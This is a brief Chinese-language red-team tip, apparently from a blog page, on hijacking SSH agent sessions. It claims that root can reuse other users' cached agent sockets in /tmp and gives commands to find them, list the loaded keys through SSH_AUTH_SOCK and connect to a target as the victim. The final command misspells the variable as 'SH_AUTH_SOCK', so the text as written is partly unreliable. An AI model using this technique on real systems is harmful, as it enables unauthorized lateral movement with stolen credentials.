Red Teamers:SSH会话劫持

Red Teamers:SSH 将正在进行的会话的密钥缓存在 /tmp 中;

root 用户可以劫持它们并通过 SSH 连接到用户可以访问的任何计算机。

ps aux | grep ssh

ls -lah /tmp

SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh-add -l

SH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh alh4zr3d@target

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注